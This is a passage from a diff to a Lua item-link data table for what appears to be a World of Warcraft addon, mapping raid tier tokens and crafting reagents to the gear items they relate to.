-- Valorous Siegebreaker Shoulderplates + ["45433"] = { + 45660, -- Spaulders of the Wayward Protector + }, + -- Belt of the Titans + ["45550"] = { + 45087, -- Runed Orb + }, + -- Indestructible Plate Girdle + ["45551"] = { + 45087, -- Runed Orb + }, + -- Plate Girdle of Righteousness + ["45552"] = { + 45087, -- Runed Orb + }, + -- Belt of Dragons + ["45553"] = { + 45087, -- Runed Orb + }, + -- Blue Belt of Chaos + ["45554"] = { + 45087, -- Runed Orb + }, + -- Death-warmed Belt + ["45555"] = { + 45087, -- Runed Orb + }, + -- Belt of Arctic Life + ["45556"] = { + 45087, -- Runed Orb + }, + -- Sash of Ancient Power + ["45557"] = { + 45087, -- Runed Orb + }, + -- Cord of the White Dawn + ["45558"] = { + 45087, -- Runed Orb + }, + -- Battlelord's Plate Boots + ["45559"] = { + 45087, -- Runed Orb + }, + -- Spiked Deathdealers + ["45560"] = { + 45087, -- Runed Orb + }, + -- Treads of Destiny + ["45561"] = { + 45087, -- Runed Orb + }, + -- Boots of Living Scale + ["45562"] = { + 45087, -- Runed Orb + }, + -- Lightning Grounded Boots + ["45563"] = { + 45087, -- Runed Orb + }, + -- Footpads of Silence + ["45564"] = { + 45087, -- Runed Orb + }, + -- Boots of Wintry Endurance + ["45565"] = { + 45087, -- Runed Orb + }, + -- Spellslinger's Slippers + ["45566"] = { + 45087, -- Runed Orb + }, + -- Savior's Slippers + ["45567"] = { + 45087, -- Runed Orb + }, + -- Drape of the Skyborn + ["45588"] = { + 46053, -- Reply-Code Alpha + }, + -- Brann's Signet Ring + ["45608"] = { + 46053, -- Reply-Code Alpha + }, + -- Starshine Circle + ["45614"] = { + 46053, -- Reply-Code Alpha + }, + -- Sunglimmer Cloak + ["45618"] = { + 46053, -- Reply-Code Alpha + }, + -- Breastplate of the Wayward Conqueror + ["45632"] = { + 46137, -- Conqueror's Deathbringer Robe + 46154, -- Conqueror's Aegis Battleplate + 46168, -- Conqueror's Raiments of Sanctification + 46173, -- Conqueror's Aegis Breastplate + 46178, -- Conqueror's Aegis Tunic + 46193, -- Conqueror's Robe of Sanctification + }, + -- Breastplate of the Wayward Protector + ["45633"] = { + 46141, -- Conqueror's Scourgestalker Tunic + 46146, -- Conqueror's Siegebreaker Battleplate + 46162, -- Conqueror's Siegebreaker Breastplate + 46198, -- Conqueror's Worldbreaker Tunic + 46205, -- Conqueror's Worldbreaker Chestguard + 46206, -- Conqueror's Worldbreaker Hauberk + }, + -- Breastplate of the Wayward Vanquisher + ["45634"] = { + 46111, -- Conqueror's Darkruned Battleplate + 46118, -- Conqueror's Darkruned Chestguard + 46123, -- Conqueror's Terrorblade Breastplate + 46130, -- Conqueror's Kirin Tor Tunic + 46159, -- Conqueror's Nightsong Raiments + 46186, -- Conqueror's Nightsong Robe + 46194, -- Conqueror's Nightsong Vestments + }, + -- Chestguard of the Wayward Conqueror + ["45635"] = { + 45374, -- Valorous Aegis Tunic + 45375, -- Valorous Aegis Battleplate + 45381, -- Valorous Aegis Breastplate + 45389, -- Valorous Robe of Sanctification + 45395, -- Valorous Raiments of Sanctification + 45421, -- Valorous Deathbringer Robe + }, + -- Chestguard of the Wayward Protector + ["45636"] = { + 45364, -- Valorous Scourgestalker Tunic + 45405, -- Valorous Worldbreaker Tunic + 45411, -- Valorous Worldbreaker Hauberk + 45413, -- Valorous Worldbreaker Chestguard + 45424, -- Valorous Siegebreaker Breastplate + 45429, -- Valorous Siegebreaker Battleplate + }, + -- Chestguard of the Wayward Vanquisher + ["45637"] = { + 45335, -- Valorous Darkruned Chestguard + 45340, -- Valorous Darkruned Battleplate + 45348, -- Valorous Nightsong Robe + 45354, -- Valorous Nightsong Vestments + 45358, -- Valorous Nightsong Raiments + 45368, -- Valorous Kirin Tor Tunic + 45396, -- Valorous Terrorblade Breastplate + }, + -- Crown of the Wayward Conqueror + ["45638"] = { + 46140, -- Conqueror's Deathbringer Hood + 46156, -- Conqueror's Aegis Helm + 46172, -- Conqueror's Circlet of Sanctification + 46175, -- Conqueror's Aegis Faceguard + 46180, -- Conqueror's Aegis Headpiece + 46197, -- Conqueror's Cowl of Sanctification + }, + -- Crown of the Wayward Protector + ["45639"] = { + 46143, -- Conqueror's Scourgestalker Headpiece + 46151, -- Conqueror's Siegebreaker Helmet + 46166, -- Conqueror's Siegebreaker Greathelm + 46201, -- Conqueror's Worldbreaker Headpiece + 46209, -- Conqueror's Worldbreaker Helm + 46212, -- Conqueror's Worldbreaker Faceguard + }, + -- Crown of the Wayward Vanquisher + ["45640"] = { + 46115, -- Conqueror's Darkruned Helmet + 46120, -- Conqueror's Darkruned Faceguard + 46125, -- Conqueror's Terrorblade Helmet + 46129, -- Conqueror's Kirin Tor Hood + 46161, -- Conqueror's Nightsong Headguard + 46184, -- Conqueror's Nightsong Headpiece + 46191, -- Conqueror's Nightsong Cover + }, + -- Gauntlets of the Wayward Conqueror + ["45641"] = { + 46135, -- Conqueror's Deathbringer Gloves + 46155, -- Conqueror's Aegis Gauntlets + 46163, -- Conqueror's Handwraps of Sanctification + 46174, -- Conqueror's Aegis Handguards + 46179, -- Conqueror's Aegis Gloves + 46188, -- Conqueror's Gloves of Sanctification + }, + -- Gauntlets of the Wayward Protector + ["45642"] = { + 46142, -- Conqueror's Scourgestalker Handguards + 46148, -- Conqueror's Siegebreaker Gauntlets + 46164, -- Conqueror's Siegebreaker Handguards + 46199, -- Conqueror's Worldbreaker Handguards + 46200, -- Conqueror's Worldbreaker Grips + 46207, -- Conqueror's Worldbreaker Gloves + }, + -- Gauntlets of the Wayward Vanquisher + ["45643"] = { + 46113, -- Conqueror's Darkruned Gauntlets + 46119, -- Conqueror's Darkruned Handguards + 46124, -- Conqueror's Terrorblade Gauntlets + 46132, -- Conqueror's Kirin Tor Gauntlets + 46158, -- Conqueror's Nightsong Handgrips + 46183, -- Conqueror's Nightsong Handguards + 46189, -- Conqueror's Nightsong Gloves + }, + -- Gloves of the Wayward Conqueror + ["45644"] = { + 45370, -- Valorous Aegis Gloves + 45376, -- Valorous Aegis Gauntlets + 45383, -- Valorous Aegis Handguards + 45387, -- Valorous Gloves of Sanctification + 45392, -- Valorous Handwraps of Sanctification + 45419, -- Valorous Deathbringer Gloves + }, + -- Gloves of the Wayward Protector + ["45645"] = { + 45360, -- Valorous Scourgestalker Handguards + 45401, -- Valorous Worldbreaker Handguards + 45406, -- Valorous Worldbreaker Gloves + 45414, -- Valorous Worldbreaker Grips + 45426, -- Valorous Siegebreaker Handguards + 45430, -- Valorous Siegebreaker Gauntlets + }, + -- Gloves of the Wayward Vanquisher + ["45646"] = { + 45337, -- Valorous Darkruned Handguards + 45341, -- Valorous Darkruned Gauntlets + 45345, -- Valorous Nightsong Handguards + 45351, -- Valorous Nightsong Gloves + 45355, -- Valorous Nightsong Handgrips + 45397, -- Valorous Terrorblade Gauntlets + 46131, -- Valorous Kirin Tor Gauntlets + }, + -- Helm of the Wayward Conqueror + ["45647"] = { + 45372, -- Valorous Aegis Headpiece + 45377, -- Valorous Aegis Helm + 45382, -- Valorous Aegis Faceguard + 45386, -- Valorous Cowl of Sanctification + 45391, -- Valorous Circlet of Sanctification + 45417, -- Valorous Deathbringer Hood + }, + -- Helm of the Wayward Protector + ["45648"] = { + 45361, -- Valorous Scourgestalker Headpiece + 45402, -- Valorous Worldbreaker Headpiece + 45408, -- Valorous Worldbreaker Helm + 45412, -- Valorous Worldbreaker Faceguard + 45425, -- Valorous Siegebreaker Greathelm + 45431, -- Valorous Siegebreaker Helmet + }, + -- Helm of the Wayward Vanquisher + ["45649"] = { + 45336, -- Valorous Darkruned Faceguard + 45342, -- Valorous Darkruned Helmet + 45346, -- Valorous Nightsong Headpiece + 45356, -- Valorous Nightsong Headguard + 45365, -- Valorous Kirin Tor Hood + 45398, -- Valorous Terrorblade Helmet + 46313, -- Valorous Nightsong Cover + }, + -- Leggings of the Wayward Conqueror + ["45650"] = { + 45371, -- Valorous Aegis Greaves + 45379, -- Valorous Aegis Legplates + 45384, -- Valorous Aegis Legguards + 45388, -- Valorous Leggings of Sanctification + 45394, -- Valorous Pants of Sanctification + 45420, -- Valorous Deathbringer Leggings + }, + -- Leggings of the Wayward Protector + ["45651"] = { + 45362, -- Valorous Scourgestalker Legguards + 45403, -- Valorous Worldbreaker Legguards + 45409, -- Valorous Worldbreaker Kilt + 45416, -- Valorous Worldbreaker War-Kilt + 45427, -- Valorous Siegebreaker Legguards + 45432, -- Valorous Siegebreaker Legplates + }, + -- Leggings of the Wayward Vanquisher + ["45652"] = { + 45338, -- Valorous Darkruned Legguards + 45343, -- Valorous Darkruned Legplates + 45347, -- Valorous Nightsong Leggings + 45353, -- Valorous Nightsong Trousers + 45357, -- Valorous Nightsong Legguards + 45367, -- Valorous Kirin Tor Leggings + 45399, -- Valorous Terrorblade Legplates + }, + -- Legplates of the Wayward Conqueror + ["45653"] = { + 46139, -- Conqueror's Deathbringer Leggings + 46153, -- Conqueror's Aegis Legplates + 46170, -- Conqueror's Pants of Sanctification + 46176, -- Conqueror's Aegis Legguards + 46181, -- Conqueror's Aegis Greaves + 46195, -- Conqueror's Leggings of Sanctification + }, + -- Legplates of the Wayward Protector + ["45654"] = { + 46144, -- Conqueror's Scourgestalker Legguards + 46150, -- Conqueror's Siegebreaker Legplates + 46169, -- Conqueror's Siegebreaker Legguards + 46202, -- Conqueror's Worldbreaker Legguards + 46208, -- Conqueror's Worldbreaker War-Kilt + 46210, -- Conqueror's Worldbreaker Kilt + }, + -- Legplates of the Wayward Vanquisher + ["45655"] = { + 46116, -- Conqueror's Darkruned Legplates + 46121, -- Conqueror's Darkruned Legguards + 46126, -- Conqueror's Terrorblade Legplates + 46133, -- Conqueror's Kirin Tor Leggings + 46160, -- Conqueror's Nightsong Legguards + 46185, -- Conqueror's Nightsong Leggings + 46192, -- Conqueror's Nightsong Trousers + }, + -- Mantle of the Wayward Conqueror + ["45656"] = { + 46136, -- Conqueror's Deathbringer Shoulderpads + 46152, -- Conqueror's Aegis Shoulderplates + 46165, -- Conqueror's Mantle of Sanctification + 46177, -- Conqueror's Aegis Shoulderguards + 46182, -- Conqueror's Aegis Spaulders + 46190, -- Conqueror's Shoulderpads of Sanctification + }, + -- Mantle of the Wayward Protector + ["45657"] = { + 46145, -- Conqueror's Scourgestalker Spaulders + 46149, -- Conqueror's Siegebreaker Shoulderplates + 46167, -- Conqueror's Siegebreaker Pauldrons + 46203, -- Conqueror's Worldbreaker Shoulderguards + 46204, -- Conqueror's Worldbreaker Spaulders + 46211, -- Conqueror's Worldbreaker Shoulderpads + }, + -- Mantle of the Wayward Vanquisher + ["45658"] = { + 46117, -- Conqueror's Darkruned Shoulderplates + 46122, -- Conqueror's Darkruned Pauldrons + 46127, -- Conqueror's Terrorblade Pauldrons + 46134, -- Conqueror's Kirin Tor Shoulderpads + 46157, -- Conqueror's Nightsong Shoulderpads + 46187, -- Conqueror's Nightsong Spaulders + 46196, -- Conqueror's Nightsong Mantle + }, + -- Spaulders of the Wayward Conqueror + ["45659"] = { + 45373, -- Valorous Aegis Spaulders + 45380, -- Valorous Aegis Shoulderplates + 45385, -- Valorous Aegis Shoulderguards + 45390, -- Valorous Shoulderpads of Sanctification + 45393, -- Valorous Mantle of Sanctification + 45422, -- Valorous Deathbringer Shoulderpads + }, + -- Spaulders of the Wayward Protector + ["45660"] = { + 45363, -- Valorous Scourgestalker Spaulders + 45404, -- Valorous Worldbreaker Spaulders + 45410, -- Valorous Worldbreaker Shoulderpads + 45415, -- Valorous Worldbreaker Shoulderguards + 45428, -- Valorous Siegebreaker Pauldrons + 45433, -- Valorous Siegebreaker Shoulderplates + }, + -- Spaulders of the Wayward Vanquisher + ["45661"] = { + 45339, -- Valorous Darkruned Pauldrons + 45344, -- Valorous Darkruned Shoulderplates + 45349, -- Valorous Nightsong Spaulders + 45352, -- Valorous Nightsong Mantle + 45359, -- Valorous Nightsong Shoulderpads + 45369, -- Valorous Kirin Tor Shoulderpads + 45400, -- Valorous Terrorblade Pauldrons + }, + -- Unbound Fragments of Val'anyr + ["45896"] = { + 45038, -- Fragment of Val'anyr + }, + -- Reforged Hammer of Ancient Kings + ["45897"] = { + 45038, -- Fragment of Val'anyr + }, + -- Val'anyr, Hammer of Ancient Kings + ["46017"] = { + 45038, -- Fragment of Val'anyr + }, + -- Reply-Code Alpha + ["46052"] = { + 46320, -- Drape of the Skyherald + 46321, -- Sunglimmer Drape + 46322, -- Brann's Sealing Ring + 46323, -- Starshine Signet + }, + -- Reply-Code Alpha + ["46053"] = { + 45588, -- Drape of the Skyborn + 45608, -- Brann's Signet Ring + 45614, -- Starshine Circle + 45618, -- Sunglimmer Cloak + }, + -- Conqueror's Darkruned Battleplate + ["46111"] = { + 45634, -- Breastplate of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Gauntlets + ["46113"] = { + 45643, -- Gauntlets of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Helmet + ["46115"] = { + 45640, -- Crown of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Legplates + ["46116"] = { + 45655, -- Legplates of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Shoulderplates + ["46117"] = { + 45658, -- Mantle of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Chestguard + ["46118"] = { + 45634, -- Breastplate of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Handguards + ["46119"] = { + 45643, -- Gauntlets of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Faceguard + ["46120"] = { + 45640, -- Crown of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Legguards + ["46121"] = { + 45655, -- Legplates of the Wayward Vanquisher + }, + -- Conqueror's Darkruned Pauldrons + ["46122"] = { + 45658, -- Mantle of the Wayward Vanquisher + }, + -- Conqueror's Terrorblade Breastplate + ["46123"] = { + 45634, -- Breastplate of the Wayward Vanquisher + }, + -- Conqueror's Terrorblade Gauntlets + ["46124"] = { + 45643, -- Gauntlets of the Wayward Vanquisher + }, + -- Conqueror's Terrorblade Helmet + ["46125"] = { + 45640, -- Crown of the Wayward Vanquisher + }, + -- Conqueror's Terrorblade Legplates + ["46126"] = { + 45655, -- Legplates of the Wayward Vanquisher + }, + -- Conqueror's Terrorblade Pauldrons + ["46127"] = { + 45658, -- Mantle of the Wayward Vanquisher + }, + -- Conqueror's Kirin Tor Hood + ["46129"] = { + 45640, -- Crown of the Wayward Vanquisher + }, + -- Conqueror's Kirin Tor Tunic + ["46130"] = { + 45634, -- Breastplate of the Wayward Vanquisher + }, + -- Valorous Kirin Tor Gauntlets + ["46131"] = { + 45646, -- Gloves of the Wayward Vanquisher + }, + -- Conqueror's Kirin Tor Gauntlets + ["46132"] = { + 45643, -- Gauntlets of the Wayward Vanquisher + }, + -- Conqueror's Kirin Tor Leggings + ["46133"] = { + 45655, -- Legplates of the Wayward Vanquisher + }, + -- Conqueror's Kirin Tor Shoulderpads + ["46134"] = { + 45658, -- Mantle of the Wayward Vanquisher + }, + -- Conqueror's Deathbringer Gloves + ["46135"] = { + 45641, -- Gauntlets of the Wayward Conqueror + }, + -- Conqueror's Deathbringer Shoulderpads + ["46136"] = { + 45656, -- Mantle of the Wayward Conqueror + }, + -- Conqueror's Deathbringer Robe + ["46137"] = { + 45632, -- Breastplate of the Wayward Conqueror + }, + -- Conqueror's Deathbringer Leggings + ["46139"] = { + 45653, -- Legplates of the Wayward Conqueror + }, + -- Conqueror's Deathbringer Hood + ["46140"] = { + 45638, -- Crown of the Wayward Conqueror + }, + -- Conqueror's Scourgestalker Tunic + ["46141"] = { + 45633, -- Breastplate of the Wayward Protector + }, + -- Conqueror's Scourgestalker Handguards + ["46142"] = { + 45642, -- Gauntlets of the Wayward Protector + }, + -- Conqueror's Scourgestalker Headpiece + ["46143"] = { + 45639, -- Crown of the Wayward Protector + }, + -- Conqueror's Scourgestalker Legguards + ["46144"] = { + 45654, -- Legplates of the Wayward Protector + }, + -- Conqueror's Scourgestalker Spaulders + ["46145"] = { + 45657, -- Mantle of the Wayward Protector + }, + -- Conqueror's Siegebreaker Battleplate + ["46146"] = { + 45633, -- Breastplate of the Wayward Protector + }, + -- Conqueror's Siegebreaker Gauntlets + ["46148"] = { + 45642, -- Gauntlets of the Wayward Protector + }, + -- Conqueror's Siegebreaker Shoulderplates + ["46149"] = { + 45657, -- Mantle of the Wayward Protector + }, + -- Conqueror's Siegebreaker Legplates + ["46150"] = { + 45654, -- Legplates of the Wayward Protector + }, + -- Conqueror's Siegebreaker Helmet + ["46151"] = { + 45639, -- Crown of the Wayward Protector + }, + -- Conqueror's Aegis Shoulderplates + ["46152"] = { + 45656, -- Mantle of the Wayward Conqueror + }, + -- Conqueror's Aegis Legplates + ["46153"] = { + 45653, -- Legplates of the Wayward Conqueror + }, + -- Conqueror's Aegis Battleplate + ["46154"] = { + 45632, -- Breastplate of the Wayward Conqueror + }, + -- Conqueror's Aegis Gauntlets + ["46155"] = { + 45641, -- Gauntlets of the Wayward Conqueror + }, + -- Conqueror's Aegis Helm + ["46156"] = { + 45638, -- Crown of the Wayward Conqueror + }, + -- Conqueror's Nightsong Shoulderpads + ["46157"] = { + 45658, -- Mantle of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Handgrips + ["46158"] = { + 45643, -- Gauntlets of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Raiments + ["46159"] = { + 45634, -- Breastplate of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Legguards + ["46160"] = { + 45655, -- Legplates of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Headguard + ["46161"] = { + 45640, -- Crown of the Wayward Vanquisher + }, + -- Conqueror's Siegebreaker Breastplate + ["46162"] = { + 45633, -- Breastplate of the Wayward Protector + }, + -- Conqueror's Handwraps of Sanctification + ["46163"] = { + 45641, -- Gauntlets of the Wayward Conqueror + }, + -- Conqueror's Siegebreaker Handguards + ["46164"] = { + 45642, -- Gauntlets of the Wayward Protector + }, + -- Conqueror's Mantle of Sanctification + ["46165"] = { + 45656, -- Mantle of the Wayward Conqueror + }, + -- Conqueror's Siegebreaker Greathelm + ["46166"] = { + 45639, -- Crown of the Wayward Protector + }, + -- Conqueror's Siegebreaker Pauldrons + ["46167"] = { + 45657, -- Mantle of the Wayward Protector + }, + -- Conqueror's Raiments of Sanctification + ["46168"] = { + 45632, -- Breastplate of the Wayward Conqueror + }, + -- Conqueror's Siegebreaker Legguards + ["46169"] = { + 45654, -- Legplates of the Wayward Protector + }, + -- Conqueror's Pants of Sanctification + ["46170"] = { + 45653, -- Legplates of the Wayward Conqueror + }, + -- Conqueror's Circlet of Sanctification + ["46172"] = { + 45638, -- Crown of the Wayward Conqueror + }, + -- Conqueror's Aegis Breastplate + ["46173"] = { + 45632, -- Breastplate of the Wayward Conqueror + }, + -- Conqueror's Aegis Handguards + ["46174"] = { + 45641, -- Gauntlets of the Wayward Conqueror + }, + -- Conqueror's Aegis Faceguard + ["46175"] = { + 45638, -- Crown of the Wayward Conqueror + }, + -- Conqueror's Aegis Legguards + ["46176"] = { + 45653, -- Legplates of the Wayward Conqueror + }, + -- Conqueror's Aegis Shoulderguards + ["46177"] = { + 45656, -- Mantle of the Wayward Conqueror + }, + -- Conqueror's Aegis Tunic + ["46178"] = { + 45632, -- Breastplate of the Wayward Conqueror + }, + -- Conqueror's Aegis Gloves + ["46179"] = { + 45641, -- Gauntlets of the Wayward Conqueror + }, + -- Conqueror's Aegis Headpiece + ["46180"] = { + 45638, -- Crown of the Wayward Conqueror + }, + -- Conqueror's Aegis Greaves + ["46181"] = { + 45653, -- Legplates of the Wayward Conqueror + }, + -- Conqueror's Aegis Spaulders + ["46182"] = { + 45656, -- Mantle of the Wayward Conqueror + }, + -- Conqueror's Nightsong Handguards + ["46183"] = { + 45643, -- Gauntlets of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Headpiece + ["46184"] = { + 45640, -- Crown of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Leggings + ["46185"] = { + 45655, -- Legplates of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Robe + ["46186"] = { + 45634, -- Breastplate of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Spaulders + ["46187"] = { + 45658, -- Mantle of the Wayward Vanquisher + }, + -- Conqueror's Gloves of Sanctification + ["46188"] = { + 45641, -- Gauntlets of the Wayward Conqueror + }, + -- Conqueror's Nightsong Gloves + ["46189"] = { + 45643, -- Gauntlets of the Wayward Vanquisher + }, + -- Conqueror's Shoulderpads of Sanctification + ["46190"] = { + 45656, -- Mantle of the Wayward Conqueror + }, + -- Conqueror's Nightsong Cover + ["46191"] = { + 45640, -- Crown of the Wayward Vanquisher + }, + -- Conqueror's Nightsong Trousers + ["46192"] = { + 45655, -- Legplates of the Wayward Vanquisher + }, + -- Conqueror's Robe of Sanctification + ["46193"] = { + 45632, -- Breastplate of the Wayward Conqueror + }, + -- Conqueror's Nightsong Vestments + ["46194"] = { + 45634, -- Breastplate of the Wayward Vanquisher + }, + -- Conqueror's Leggings of Sanctification + ["46195"] = { + 45653, -- Legplates of the Wayward Conqueror + }, + -- Conqueror's Nightsong Mantle + ["46196"] = { + 45658, -- Mantle of the Wayward Vanquisher + }, + -- Conqueror's Cowl of Sanctification + ["46197"] = { + 45638, -- Crown of the Wayward Conqueror + }, + -- Conqueror's Worldbreaker Tunic + ["46198"] = { + 45633, -- Breastplate of the Wayward Protector + }, + -- Conqueror's Worldbreaker Handguards + ["46199"] = { + 45642, -- Gauntlets of the Wayward Protector + }, + -- Conqueror's Worldbreaker Grips + ["46200"] = { + 45642, -- Gauntlets of the Wayward Protector + }, + -- Conqueror's Worldbreaker Headpiece + ["46201"] = { + 45639, -- Crown of the Wayward Protector + }, + -- Conqueror's Worldbreaker Legguards + ["46202"] = { + 45654, -- Legplates of the Wayward Protector + }, + -- Conqueror's Worldbreaker Shoulderguards + ["46203"] = { + 45657, -- Mantle of the Wayward Protector + }, + -- Conqueror's Worldbreaker Spaulders + ["46204"] = { + 45657, -- Mantle of the Wayward Protector + }, + -- Conqueror's Worldbreaker Chestguard + ["46205"] = { + 45633, -- Breastplate of the Wayward Protector + }, + -- Conqueror's Worldbreaker Hauberk + ["46206"] = { + 45633, -- Breastplate of the Wayward Protector + }, + -- Conqueror's Worldbreaker Gloves + ["46207"] = { + 45642, -- Gauntlets of the Wayward Protector + }, + -- Conqueror's Worldbreaker War-Kilt + ["46208"] = { + 45654, -- Legplates of the Wayward Protector + }, + -- Conqueror's Worldbreaker Helm + ["46209"] = { + 45639, -- Crown of the Wayward Protector + }, + -- Conqueror's Worldbreaker Kilt + ["46210"] = { + 45654, -- Legplates of the Wayward Protector + }, + -- Conqueror's Worldbreaker Shoulderpads + ["46211"] = { + 45657, -- Mantle of the Wayward Protector + }, + -- Conqueror's Worldbreaker Faceguard + ["46212"] = { + 45639, -- Crown of the Wayward Protector + }, + -- Valorous Nightsong Cover + ["46313"] = { + 45649, -- Helm of the Wayward Vanquisher + }, + -- Drape of the Skyherald + ["46320"] = { + 46052, -- Reply-Code Alpha + }, + -- Sunglimmer Drape + ["46321"] = { + 46052, -- Reply-Code Alpha + }, + -- Brann's Sealing Ring + ["46322"] = { + 46052, -- Reply-Code Alpha + }, + -- Starshine Signet + ["46323"] = { + 46052, -- Reply-Code Alpha + }, + -- Trophy of the Crusade + ["47242"] = { + 47753, -- Khadgar's Gauntlets of Triumph + 47754, -- Khadgar's Hood of Triumph + 47755, -- Khadgar's Leggings of Triumph + 47756, -- Khadgar's Robe of Triumph + 47757, -- Khadgar's Shoulderpads of Triumph + 47768, -- Sunstrider's Shoulderpads of Triumph + 47769, -- Sunstrider's Robe of Triumph + 47770, -- Sunstrider's Leggings of Triumph + 47771, -- Sunstrider's Hood of Triumph + 47772, -- Sunstrider's Gauntlets of Triumph + 47778, -- Kel'Thuzad's Hood of Triumph + 47779, -- Kel'Thuzad's Robe of Triumph + 47780, -- Kel'Thuzad's Leggings of Triumph + 47781, -- Kel'Thuzad's Shoulderpads of Triumph + 47782, -- Kel'Thuzad's Gloves of Triumph + 47803, -- Gul'dan's Gloves of Triumph + 47804, -- Gul'dan's Hood of Triumph + 47805, -- Gul'dan's Leggings of Triumph + 47806, -- Gul'dan's Robe of Triumph + 47807, -- Gul'dan's Shoulderpads of Triumph + 47983, -- Velen's Gloves of Triumph + 47984, -- Velen's Cowl of Triumph + 47985, -- Velen's Leggings of Triumph + 47986, -- Velen's Robe of Triumph + 47987, -- Velen's Shoulderpads of Triumph + 48062, -- Zabra's Shoulderpads of Triumph 48063, -- Zabra's Robe of Triumph 48064, -- Zabra's Leggings of Triumph 48065, -- Zabra's Cowl of Triumph @@ -6084,6801 +9714,10895 @@ GL.Data.ItemLinks = { 48660, -- Liadrin's Legguards of Triumph 48661, -- Liadrin's Shoulderguards of Triumph }, - -- Crusader Orb - ["47556"] = { - 47570, -- Saronite Swordbreakers - 47571, -- Saronite Swordbreakers - 47572, -- Titanium Spikeguards - 47573, -- Titanium Spikeguards - 47574, -- Sunforged Bracers - 47575, -- Sunforged Bracers - 47576, -- Crusader's Dragonscale Bracers - 47577, -- Crusader's Dragonscale Bracers - 47579, -- Black Chitin Bracers - 47580, -- Black Chitin Bracers - 47581, -- Bracers of Swift Death - 47582, -- Bracers of Swift Death - 47583, -- Moonshadow Armguards - 47584, -- Moonshadow Armguards - 47585, -- Bejeweled Wizard's Bracers - 47586, -- Bejeweled Wizard's Bracers - 47587, -- Royal Moonshroud Bracers - 47588, -- Royal Moonshroud Bracers - 47589, -- Titanium Razorplate - 47590, -- Titanium Razorplate - 47591, -- Breastplate of the White Knight - 47592, -- Breastplate of the White Knight - 47593, -- Sunforged Breastplate - 47594, -- Sunforged Breastplate - 47595, -- Crusader's Dragonscale Breastplate - 47596, -- Crusader's Dragonscale Breastplate - 47597, -- Ensorcelled Nerubian Breastplate - 47598, -- Ensorcelled Nerubian Breastplate - 47599, -- Knightbane Carapace - 47600, -- Knightbane Carapace - 47601, -- Lunar Eclipse Robes - 47602, -- Lunar Eclipse Robes - 47603, -- Merlin's Robe - 47604, -- Merlin's Robe - 47605, -- Royal Moonshroud Robe - 47606, -- Royal Moonshroud Robe + -- Crusader Orb + ["47556"] = { + 47570, -- Saronite Swordbreakers + 47571, -- Saronite Swordbreakers + 47572, -- Titanium Spikeguards + 47573, -- Titanium Spikeguards + 47574, -- Sunforged Bracers + 47575, -- Sunforged Bracers + 47576, -- Crusader's Dragonscale Bracers + 47577, -- Crusader's Dragonscale Bracers + 47579, -- Black Chitin Bracers + 47580, -- Black Chitin Bracers + 47581, -- Bracers of Swift Death + 47582, -- Bracers of Swift Death + 47583, -- Moonshadow Armguards + 47584, -- Moonshadow Armguards + 47585, -- Bejeweled Wizard's Bracers + 47586, -- Bejeweled Wizard's Bracers + 47587, -- Royal Moonshroud Bracers + 47588, -- Royal Moonshroud Bracers + 47589, -- Titanium Razorplate + 47590, -- Titanium Razorplate + 47591, -- Breastplate of the White Knight + 47592, -- Breastplate of the White Knight + 47593, -- Sunforged Breastplate + 47594, -- Sunforged Breastplate + 47595, -- Crusader's Dragonscale Breastplate + 47596, -- Crusader's Dragonscale Breastplate + 47597, -- Ensorcelled Nerubian Breastplate + 47598, -- Ensorcelled Nerubian Breastplate + 47599, -- Knightbane Carapace + 47600, -- Knightbane Carapace + 47601, -- Lunar Eclipse Robes + 47602, -- Lunar Eclipse Robes + 47603, -- Merlin's Robe + 47604, -- Merlin's Robe + 47605, -- Royal Moonshroud Robe + 47606, -- Royal Moonshroud Robe + }, + -- Regalia of the Grand Conqueror + ["47557"] = { + 47788, -- Kel'Thuzad's Gloves of Triumph + 47789, -- Kel'Thuzad's Hood of Triumph + 47790, -- Kel'Thuzad's Leggings of Triumph + 47791, -- Kel'Thuzad's Robe of Triumph + 47792, -- Kel'Thuzad's Shoulderpads of Triumph + 47793, -- Gul'dan's Shoulderpads of Triumph + 47794, -- Gul'dan's Robe of Triumph + 47795, -- Gul'dan's Leggings of Triumph + 47796, -- Gul'dan's Hood of Triumph + 47797, -- Gul'dan's Gloves of Triumph + 48029, -- Velen's Shoulderpads of Triumph + 48031, -- Velen's Robe of Triumph + 48033, -- Velen's Leggings of Triumph + 48035, -- Velen's Cowl of Triumph + 48037, -- Velen's Gloves of Triumph + 48057, -- Zabra's Gloves of Triumph + 48058, -- Zabra's Cowl of Triumph + 48059, -- Zabra's Leggings of Triumph + 48060, -- Zabra's Robe of Triumph + 48061, -- Zabra's Shoulderpads of Triumph + 48082, -- Velen's Mantle of Triumph + 48083, -- Velen's Raiments of Triumph + 48084, -- Velen's Pants of Triumph + 48085, -- Velen's Circlet of Triumph + 48086, -- Velen's Handwraps of Triumph + 48087, -- Zabra's Handwraps of Triumph + 48088, -- Zabra's Circlet of Triumph + 48089, -- Zabra's Pants of Triumph + 48090, -- Zabra's Raiments of Triumph + 48091, -- Zabra's Mantle of Triumph + 48580, -- Turalyon's Spaulders of Triumph + 48581, -- Turalyon's Greaves of Triumph + 48582, -- Turalyon's Headpiece of Triumph + 48583, -- Turalyon's Gloves of Triumph + 48584, -- Turalyon's Tunic of Triumph + 48585, -- Liadrin's Spaulders of Triumph + 48586, -- Liadrin's Greaves of Triumph + 48587, -- Liadrin's Headpiece of Triumph + 48588, -- Liadrin's Gloves of Triumph + 48589, -- Liadrin's Tunic of Triumph + 48612, -- Turalyon's Shoulderplates of Triumph + 48613, -- Turalyon's Legplates of Triumph + 48614, -- Turalyon's Helm of Triumph + 48615, -- Turalyon's Gauntlets of Triumph + 48616, -- Turalyon's Battleplate of Triumph + 48617, -- Liadrin's Battleplate of Triumph + 48618, -- Liadrin's Gauntlets of Triumph + 48619, -- Liadrin's Helm of Triumph + 48620, -- 